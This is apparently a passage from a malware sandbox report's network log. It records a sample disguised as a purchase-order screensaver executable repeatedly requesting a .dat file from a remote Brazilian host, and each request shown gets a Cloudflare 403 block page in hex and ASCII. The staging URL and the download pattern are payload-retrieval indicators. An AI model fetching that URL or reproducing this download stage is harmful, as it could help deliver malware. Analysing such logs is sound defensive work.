        2025-01-09 07:37:21 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:37:21 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 66 37 38 38 30 63 63 33 66 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2f7880cc3f3</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:37:21 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 66 37 38 38 30 63 63 33 66 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2f7880cc3f3',t:'MTczNjQwODI0MS4wMDAwMDA='};var a=doc
        2025-01-09 07:37:21 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        139192.168.2.949848188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:22 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:22 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:22 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:37 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9GcMlalLnOTpwfqnWEYfXAidPDv8cKSERmBO2x6Dhc%2BhNYSzLDCSL3oUzrWSb0ndvOOE4Jt0zyPJ7Gf9cBvFsGJX%2Bat5fVvwwaMtfjpqthwea0JcM4TdFFMf9TSgGGD7G7hJQ9xxkTSQj8t"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2fb9f787c99-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1988&rtt_var=750&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1454907&cwnd=235&unsent_bytes=0&cid=c60d10f8b6f8c708&ts=170&x=0"
        2025-01-09 07:37:22 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:22 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:37:22 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:37:22 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 66 62 39 66 37 38 37 63 39 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2fb9f787c99</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:37:22 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 66 62 39 66 37 38 37 63 39 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2fb9f787c99',t:'MTczNjQwODI0Mi4wMDAwMDA='};var a=d
        2025-01-09 07:37:22 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        140192.168.2.949849188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:23 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:23 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:23 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:38 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWSFkyyPkR%2Fvmarjb7MSWibMDQEttBxmxpju8IM6h%2F8xnozFYyK8zOloxUnoS7PXKAPpPLWbXmvVtqKu4QL9bp3IFmkGEiWbbtiIImxhjHfVfBvx4g4aBiA%2BK8Q04dw%2F8LQaGzB5Nt%2BsmGLF"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2ffb9495e6e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1557&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1793611&cwnd=235&unsent_bytes=0&cid=8014d7f0a42d873e&ts=145&x=0"
        2025-01-09 07:37:23 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:23 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:37:23 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:37:23 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 66 66 62 39 34 39 35 65 36 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2ffb9495e6e</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:37:23 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 66 66 62 39 34 39 35 65 36 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 30 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2ffb9495e6e',t:'MTczNjQwODI0My4wMDAwMDA='};v
        2025-01-09 07:37:23 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        141192.168.2.949850188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:23 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:23 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:23 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:38 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0kq1ggO9gu5kBEnGxRBz5qB6pjhwKnfrlf9wfXXAIybAnh7GnPRMq%2BWtKKVHG7HvY3N0LFIPgBfzpkxQPf%2FqBtLDgAZAWYE%2FbGCPw%2BgziQ8DBPmmSTr6hUbi6aK19JtfLG8uF4t0yIuE0vY2"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c3039bae5e64-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1558&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1795817&cwnd=246&unsent_bytes=0&cid=4fe4dacd80ac17a1&ts=145&x=0"
        2025-01-09 07:37:23 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:23 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:23 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:23 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 33 30 33 39 62 61 65 35 65 36 34 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 